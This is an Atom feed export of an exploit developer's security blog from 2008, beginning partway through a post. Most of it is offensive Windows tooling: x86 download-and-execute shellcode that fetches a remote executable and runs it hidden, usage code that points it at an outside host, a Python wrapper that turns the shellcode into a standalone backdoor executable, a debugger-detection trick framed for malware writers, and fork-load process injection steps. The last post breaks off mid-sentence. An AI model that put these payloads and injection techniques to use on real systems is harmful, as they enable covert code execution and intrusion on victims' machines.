        call &lt;b&gt;URLDOWNLOADTOCACHEFILEA&lt;/b&gt;-getpcloc(%ebp)  // Calling a function
                                                     // needs the name
                                                     // in caps.
                                                     // Returns an HRESULT; the
                                                     // cache file path is in szFileName

        pop %esi  // get the file name buffer back

        xorl %eax, %eax
        movl  $0x100, %ecx
        subl  %ecx, %esp
        movl %esp, %edi // CLEAR the buffer
        rep stosb

        leal 16(%esp), %ecx
        leal 84(%esp), %edx
        mov $0x1, 0x2c(%edx)                 // STARTUPINFO.dwFlags = STARTF_USESHOWWINDOW,
                                             // wShowWindow stays 0 (SW_HIDE)

        pushl %ecx   // PROCESS INFORMATION
        pushl %edx   // STARTUP INFO
        pushl %eax
        pushl %eax
        pushl %eax    // Creation Flag
        pushl %eax
        pushl %eax
        pushl %eax
        pushl %esi  // command
        pushl %eax
        call &lt;b&gt;CREATEPROCESSA&lt;/b&gt;-getpcloc(%ebp)
        xorl %eax,%eax
        pushl %eax
        call &lt;b&gt;EXITTHREAD&lt;/b&gt;-getpcloc(%ebp)
&lt;/span&gt;        """
&lt;/pre&gt;Quite simple, isn't it?
We call &lt;a href="http://msdn.microsoft.com/en-us/library/ms775122%28VS.85%29.aspx"&gt;URLDownloadToCacheFileA&lt;/a&gt; with the given URL; on success it writes the path of the downloaded file (inside the IE cache) into the szFileName buffer pointed to by %esi, and then we simply call &lt;a href="http://msdn.microsoft.com/en-us/library/ms682425.aspx"&gt;CreateProcessA&lt;/a&gt; on that path.&lt;br /&gt;&lt;br /&gt;Before I get any comments about how this code can be optimized: I KNOW, I just haven't done it yet.&lt;br /&gt;&lt;br /&gt;So the last thing we need is to return the formatted assembly code:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;       return codegen.get()&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;From your exploit, you can then do:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;import shellcode.clean.windows.payloads as payloads&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;p = payloads.payloads()&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;code = p.httpdownload("http://172.16.71.2:8080/file.exe")&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;sc = p.assemble( code )&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;sc now holds your assembled shellcode. 
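&lt;br /&gt;&lt;br /&gt;To run sc outside of an exploit you have to wrap it in an executable, which is what MOSDEF's pelib does in the snippet that follows. As an added example (it is not MOSDEF's pelib and not code from this post), here is a from-scratch Python version of such a wrapper, together with a header reader that checks what was produced. It assumes, as MOSDEF shellcode does, that the payload resolves its own APIs through the PEB, so no import table is written; the image base (0x400000), the section RVA (0x1000) and the int3 stand-in payload are my choices, not the post's. Building and parsing run on any OS; only the resulting test.exe needs a 32-bit-capable Windows target.&lt;br /&gt;&lt;br /&gt;

```python
"""Minimal PE32 wrapper for raw x86 shellcode, plus a header reader.

Added example, not MOSDEF's pelib: it shows what a createPEFileBuf()-style
helper has to produce so a debugger (or a victim) can run bare shellcode
as test.exe.

Assumptions (mine, not the post's): the shellcode resolves its own APIs
(MOSDEF-style, via the PEB), so no import table is emitted; the code is
placed in one RWX .text section at RVA 0x1000 of an image based at 0x400000.
"""

FILE_ALIGN = 0x200
SECTION_ALIGN = 0x1000
IMAGE_BASE = 0x400000
CODE_RVA = 0x1000
SUBSYSTEM_GUI = 2          # IMAGE_SUBSYSTEM_WINDOWS_GUI: no console window pops up
SUBSYSTEM_CUI = 3          # IMAGE_SUBSYSTEM_WINDOWS_CUI
TEXT_FLAGS = 0xE0000020    # CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE


def _u16(v):
    return int(v).to_bytes(2, "little")


def _u32(v):
    return int(v).to_bytes(4, "little")


def _align(n, a):
    return (n + a - 1) // a * a


def build_pe32(shellcode, gui=True):
    """Return a PE32 image whose entry point is the first shellcode byte."""
    shellcode = bytes(shellcode)
    raw_size = _align(len(shellcode), FILE_ALIGN)
    virt_size = _align(len(shellcode), SECTION_ALIGN)

    # IMAGE_DOS_HEADER: the loader only reads e_magic and e_lfanew (offset 0x3c)
    dos = b"MZ" + b"\x00" * 58 + _u32(0x40)

    # IMAGE_FILE_HEADER: i386, one section, 0xE0-byte optional header,
    # Characteristics = RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE
    coff = (_u16(0x014C) + _u16(1) + _u32(0) + _u32(0) + _u32(0)
            + _u16(0xE0) + _u16(0x0103))

    # IMAGE_OPTIONAL_HEADER32, 16 empty data directories included (no imports)
    opt = b"".join([
        _u16(0x10B), b"\x00\x00",            # Magic PE32, linker version
        _u32(raw_size), _u32(0), _u32(0),    # SizeOfCode, init/uninit data sizes
        _u32(CODE_RVA), _u32(CODE_RVA),      # AddressOfEntryPoint, BaseOfCode
        _u32(0), _u32(IMAGE_BASE),           # BaseOfData, ImageBase
        _u32(SECTION_ALIGN), _u32(FILE_ALIGN),
        _u16(4), _u16(0), _u16(0), _u16(0),  # OS version 4.0, image version 0.0
        _u16(4), _u16(0), _u32(0),           # subsystem version 4.0, Win32VersionValue
        _u32(CODE_RVA + virt_size),          # SizeOfImage
        _u32(FILE_ALIGN), _u32(0),           # SizeOfHeaders, CheckSum (unchecked for EXEs)
        _u16(SUBSYSTEM_GUI if gui else SUBSYSTEM_CUI), _u16(0),  # Subsystem, DllCharacteristics
        _u32(0x100000), _u32(0x1000),        # stack reserve / commit
        _u32(0x100000), _u32(0x1000),        # heap reserve / commit
        _u32(0), _u32(16),                   # LoaderFlags, NumberOfRvaAndSizes
    ]) + b"\x00" * (16 * 8)

    # IMAGE_SECTION_HEADER for .text: virtual size, RVA, raw size, raw offset
    sect = (b".text".ljust(8, b"\x00") + _u32(len(shellcode)) + _u32(CODE_RVA)
            + _u32(raw_size) + _u32(FILE_ALIGN) + _u32(0) + _u32(0)
            + _u16(0) + _u16(0) + _u32(TEXT_FLAGS))

    headers = dos + b"PE\x00\x00" + coff + opt + sect
    assert len(headers) == 352, "header layout drifted"   # fits inside SizeOfHeaders
    return headers.ljust(FILE_ALIGN, b"\x00") + shellcode.ljust(raw_size, b"\x00")


def parse_pe32(image):
    """Read back what a loader needs and locate the entry point in the file."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = int.from_bytes(image[0x3C:0x40], "little")
    if image[pe:pe + 4] != b"PE\x00\x00":
        raise ValueError("PE signature missing")
    coff, opt = pe + 4, pe + 24
    sect = opt + int.from_bytes(image[coff + 16:coff + 18], "little")
    entry_rva = int.from_bytes(image[opt + 16:opt + 20], "little")
    sec_vsize = int.from_bytes(image[sect + 8:sect + 12], "little")
    sec_va = int.from_bytes(image[sect + 12:sect + 16], "little")
    sec_raw = int.from_bytes(image[sect + 20:sect + 24], "little")
    entry_off = entry_rva - sec_va + sec_raw   # RVA to file offset through the section
    return {
        "sections": int.from_bytes(image[coff + 2:coff + 4], "little"),
        "entry_rva": entry_rva,
        "subsystem": int.from_bytes(image[opt + 68:opt + 70], "little"),
        "entry_file_offset": entry_off,
        "code": image[entry_off:entry_off + sec_vsize],
    }


if __name__ == "__main__":
    # Constructed stand-in for sc: eight int3s, so a debugger stops right at the entry point.
    sc = b"\xcc" * 8
    with open("test.exe", "wb") as out:
        out.write(build_pe32(sc, gui=True))
    print(parse_pe32(build_pe32(sc)))
```

Pass gui=False for a console-subsystem image when you want the process to own a console, and keep the section writable (the 0xE0000020 flags) whenever the payload patches its own bytes.&lt;br /&gt;&lt;br /&gt;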
If you want to test it in a debugger without exploiting anything, or you simply want to turn it into a standalone backdoor executable, wrap it in a PE:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;import MOSDEF.pelib as pelib&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;myPElib = pelib.PElib()&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;exe = myPElib.createPEFileBuf(sc, gui=True)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;out = open('test.exe', 'wb')&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;out.write(exe)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;out.close()&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Peace&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-1026117038431051596?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/1026117038431051596/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=1026117038431051596' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1026117038431051596'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/1026117038431051596'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/08/shellcode-you-are-doing-it-correct.html' title='Shellcode: You are doing it CORRECT'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6906863887062753173</id><published>2008-08-17T14:53:00.000-07:00</published><updated>2008-08-18T10:14:24.134-07:00</updated><title type='text'>thing you care if you are writing malware...</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_aUReV5sSeqk/SKiiLxHSO6I/AAAAAAAADDU/eSTAWju-gAo/s1600-h/insects_macro_041-1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/SKiiLxHSO6I/AAAAAAAADDU/eSTAWju-gAo/s400/insects_macro_041-1.jpg" alt="" id="BLOGGER_PHOTO_ID_5235612889864354722" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;There are millions of ways to detect a debugger. I'm usually on the other side, "millions of ways to hide a debugger", but this time let me show you a simple but neat trick.&lt;br /&gt;Call the Win32 API function &lt;a href="http://msdn.microsoft.com/en-us/library/ms683156%28VS.85%29.aspx"&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;GetCommandLine&lt;/span&gt;&lt;/a&gt; and check whether the last character is a space.&lt;br /&gt;If it isn't, the process was started from a debugger (tested on ID and WinDbg) or from the command shell. Note that this is a heuristic about how the launcher builds the command line, not about the debugger itself, so a debugger that lets you edit the command line string defeats it trivially.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;#include &amp;lt;windows.h&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;#include &amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;#include &amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;int main(void)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;{&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    LPSTR ptr;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    size_t ret;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    ptr = GetCommandLineA();   /* the raw command line exactly as the launcher built it */&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    ret = strlen(ptr);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    if (ret != 0 &amp;amp;&amp;amp; ptr[ret - 1] == ' ')   /* guard the empty string before indexing ret - 1 */&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        printf("Carry On\n");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    else&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;        printf("Debugger detected!\n");&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    return 0;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;In other news, if you feel like a good Cabernet Sauvignon, a juicy steak, or listening to hackers talk about what they know, Buenos Aires is the place to be in the first days of October:&lt;br /&gt;CanSecWest's Dragos is throwing a conference there this year: &lt;a href="http://www.ba-con.com.ar/"&gt;Ba-Con&lt;/a&gt;&lt;br /&gt;And exactly the day after, the second edition of the &lt;a href="http://www.ekoparty.com.ar/"&gt;Eko-party&lt;/a&gt; starts, including &lt;a href="http://www.immunityinc.com/"&gt;Dave Aitel&lt;/a&gt;'s keynote "Hacking Has An Economy of Scale" and &lt;a href="http://www.immunityinc.com/"&gt;Pablo Solé&lt;/a&gt;'s recon talk "Adobe javascript unleashed".&lt;br /&gt;&lt;br /&gt;I'll be around!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-6906863887062753173?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6906863887062753173/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6906863887062753173' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6906863887062753173'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6906863887062753173'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/08/thing-you-care-if-you-are-writing.html' title='thing you care if you are writing malware...'/><author><name>Nico 
Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_aUReV5sSeqk/SKiiLxHSO6I/AAAAAAAADDU/eSTAWju-gAo/s72-c/insects_macro_041-1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-3825112074791267613</id><published>2008-08-15T19:02:00.000-07:00</published><updated>2008-08-15T19:07:47.971-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='win32'/><category scheme='http://www.blogger.com/atom/ns#' term='stealing'/><category scheme='http://www.blogger.com/atom/ns#' term='bug'/><category scheme='http://www.blogger.com/atom/ns#' term='0day'/><category scheme='http://www.blogger.com/atom/ns#' term='nslookup'/><title type='text'>deep deep...</title><content type='html'>What's lower than stealing a bug from someone and publishing it?&lt;br /&gt;&lt;br /&gt;Stealing a NULL pointer read...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nullcode.com.ar/ncs/crash/nsloo.htm"&gt;http://www.nullcode.com.ar/ncs/crash/nsloo.htm&lt;/a&gt;*&lt;br /&gt;&lt;br /&gt;You must be starving for fame; go fuzz an AV!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;* The bug on that website was found by raddy a long time ago&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-3825112074791267613?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/3825112074791267613/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' 
href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=3825112074791267613' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3825112074791267613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3825112074791267613'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/08/deep-deep.html' title='deep deep...'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-801197359825917222</id><published>2008-08-07T19:34:00.000-07:00</published><updated>2008-08-07T19:43:49.054-07:00</updated><title type='text'>The exploit development's moebius strip</title><content type='html'>&lt;p style="margin-bottom: 0.2in; color: rgb(0, 0, 0);" align="left"&gt;Let me talk a little about one of my main tasks at Immunity: solving complex problems. Solving complex problems is an important and interesting job, especially for the curious minds that enjoy the masochistic task of facing difficult challenges every day.&lt;/p&gt;&lt;p style="margin-bottom: 0.2in; color: rgb(0, 0, 0);" align="left"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://ursispaltenstein.ch/blog/images/uploads_img/igor_siwanowicz.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://ursispaltenstein.ch/blog/images/uploads_img/igor_siwanowicz.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;On the flip side of all that excitement, you go through a series of moods at the different stages of the problem, which I have named "the exploit development's circle"...&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;EXCITEMENT:&lt;/span&gt; It begins with excitement about the new challenge you will be facing. You set up your environment and start getting familiar with all the details.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;DISAPPOINTMENT:&lt;/span&gt;&lt;span style="color: rgb(153, 0, 0);"&gt; &lt;/span&gt;With all the adrenaline flowing through your veins, your face hits a wall. The challenge turns out to be more complex than expected and your hopes of success sink by the minute.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;DEPRESSION:&lt;/span&gt; After days of failure, having used all your experience and all your brain cells, the exploit remains exactly as it was on the first day. The adrenaline in your blood has been replaced by epic amounts of caffeine; you go to sleep and all you can think of is the time spent on a bug that might not be exploitable at all.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;FAITH:&lt;/span&gt; You tell your boss this is impossible, that we need to switch to something else. He persistently gives you support, but your ears are too busy listening to your psychological repression mechanism telling you how bad you are at this and that you should apply for a job that requires less mental effort, such as clerk at your local video store. A millisecond before quitting this module for good, an idea emerges. You are not certain where it came from; maybe it was a sign from old Tiresias that you read subconsciously in the flight of the pigeons outside your window, or your last neuron burning its last bit of energy, but the truth is that your idea might work.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(153, 0, 0);"&gt;SUCCESS:&lt;/span&gt; It works! Your last-minute theory works. All the glory, the little pieces of colorful paper dancing in the air, the clowns, the trumpets. Your exploit is working and the cold sweat is gone. After all the congratulations, with your self-esteem above the clouds and the routine testing done (which you know will pass), your 15 minutes of glory are soon gone and the next task brings the circle back to where it started.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;p style="margin-bottom: 0.2in; color: rgb(0, 0, 0);" align="left"&gt;&lt;br /&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-801197359825917222?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/801197359825917222/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=801197359825917222' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/801197359825917222'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/801197359825917222'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2008/08/exploit-developments-moebius-strip.html' title='The exploit development&apos;s moebius strip'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-7106902405834798336</id><published>2008-08-05T18:36:00.000-07:00</published><updated>2008-08-06T07:55:15.464-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='win32'/><category scheme='http://www.blogger.com/atom/ns#' term='the great bas alberts'/><category 
scheme='http://www.blogger.com/atom/ns#' term='immunity'/><category scheme='http://www.blogger.com/atom/ns#' term='fork'/><category scheme='http://www.blogger.com/atom/ns#' term='canvas'/><category scheme='http://www.blogger.com/atom/ns#' term='shellcode'/><title type='text'>Apology of forking shellcode</title><content type='html'>&lt;span style="font-style: italic;"&gt;*Note: To practice my writing I will start doing random posts in English, most of them related to computers.*&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I remember a while back, when Dave was trying to chill out after a hard day of work, he started a simple "half an hour" hoolio (in Immunity's slang, a hoolio is an exploit for bizarre software, named after the Julio FTP Server), and so he started on Savant. For those who have never written an exploit: it takes a bit more than half an hour. Refer to &lt;a href="http://www.immunityinc.com/education-windowsoverflow-accel.shtml"&gt;Advanced Stack Overflow&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.digital-nature-photography.com/nature/GR10/GREBO160508-0055.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://www.digital-nature-photography.com/nature/GR10/GREBO160508-0055.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The last thing I did was fully port to CANVAS the neat exploit that &lt;a href="http://www.insomniasec.com/"&gt;Brett Moore&lt;/a&gt; presented at Syscan. It's a really interesting bug and a good proof of concept for Windows 2003 exploitation (starting today we are including it in the Heap Overflow training). I'm not going to get into the details since Brett covered them all; I just want to state that it is a nice bug and that with some work it can be exploited quite reliably. 
The problem was different this time: shellcode.&lt;br /&gt;&lt;br /&gt;The big problem with shellcode execution after a heap overflow is that the heap has been corrupted by whatever primitive you used, so sooner or later something will crash on an allocation. It can be repaired, but you will never be 100% sure you did it correctly, and you will probably end up with a big shellcode.&lt;br /&gt;&lt;br /&gt;Our usual answer to this problem is process injection. Bas (also known as The Great Bas Alberts) wrote a great shellcode a couple of years ago which injects MOSDEF shellcode into whatever process you point it at and runs the connect-back from there. We tag-teamed a bit on this exploit before he left, to reduce the shellcode size (since I only had around 0x300 bytes).&lt;br /&gt;&lt;br /&gt;I did all of this without checking the thread's privileges (kids, don't do that at home; we are security professionals, trained to make such dumb mistakes), so when I ran my exploit nothing significant happened.&lt;br /&gt;&lt;br /&gt;Since I believe in science, I looked for the cause, and this time I found the worst one: I didn't have SeDebugPrivilege. Usually it is present but disabled, and you can enable it with a couple of lines of assembly (AdjustTokenPrivileges), but this time it was not in the token at all. In simple words:&lt;br /&gt;Goodbye inject shellcode, welcome trouble.&lt;br /&gt;&lt;br /&gt;Next step: fork-load shellcode. We had a template of what fork shellcode was supposed to be, but it had never been finished, and so it became my task for the last couple of days. 
(Sheesh, I did all this write-up just to get to this point.)&lt;br /&gt;&lt;br /&gt;In 2003 the Last Stage of Delirium group released a paper on Win32 shellcode in which, among other amazing tricks, they describe a fork-load shellcode. They made it look simple:&lt;br /&gt;&lt;br /&gt;1) Create the process in suspended mode&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;STARTUPINFO si = {0}; PROCESS_INFORMATION pi;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;CONTEXT ctx;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, &amp;amp;si, &amp;amp;pi);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;2) Get the full context of the main thread&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;ctx.ContextFlags = CONTEXT_FULL;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;GetThreadContext(pi.hThread, &amp;amp;ctx);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;3) VirtualAlloc remotely and write our shellcode there&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;v = VirtualAllocEx(pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;WriteProcessMemory(pi.hProcess, v, buf, sizeof(buf), NULL);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;4) Make the thread's EIP point to our shellcode&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;ctx.ContextFlags = CONTEXT_FULL;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;ctx.Eip = (DWORD)v;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;SetThreadContext(pi.hThread, &amp;amp;ctx);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;5) Since the thread is suspended, resume execution&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;ResumeThread(pi.hThread);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The injected shellcode will work perfectly, as long as it only does simple things. You will have kernel32.dll and ntdll.dll loaded (but not initialized), so depending on what the shellcode does you might end up crashing on an uninitialized critical section or on similar process-startup state.&lt;br /&gt;&lt;br /&gt;To fix it we have to make a couple of tweaks. Let me show you some code:&lt;br /&gt;&lt;br /&gt;1) You need to distinguish whether you are the forking or the forked process. We did that with a simple piece of self-modifying code: the forking process patches the marker below before copying the payload into the child, so the child sees %eax == 0 and jumps to forkthis:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;forkentry:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    // if this marker is cleared this jmps to forkthis:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    // we copy this entire payload over ;)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    xorl %eax, %eax&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    incl %eax&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    test %eax,%eax&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    jz forkthis&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    // start of self modifying muck&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    // Self modifying code, change the incl for a nop&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    leal forkentry-getpcloc(%ebp),%ecx&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    movb $0x90, 2(%ecx)  // 2(%ecx) points to the incl %eax (xorl %eax,%eax is 2 bytes)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;2) CreateProcess in suspended mode&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, &amp;amp;si, &amp;amp;pi);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;3) VirtualAlloc remotely and write our (patched) shellcode there&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;v = VirtualAllocEx(pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;WriteProcessMemory(pi.hProcess, v, buf, sizeof(buf), NULL);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;4) Get the full context of the main thread&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;ctx.ContextFlags = CONTEXT_FULL;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;GetThreadContext(pi.hThread, &amp;amp;ctx);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;5) Create a remote thread on the copied payload and run it&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;CreateRemoteThread(pi.hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)v, NULL, 0, NULL);&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;6) Resume the main thread, so the new process finishes initializing&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;    // 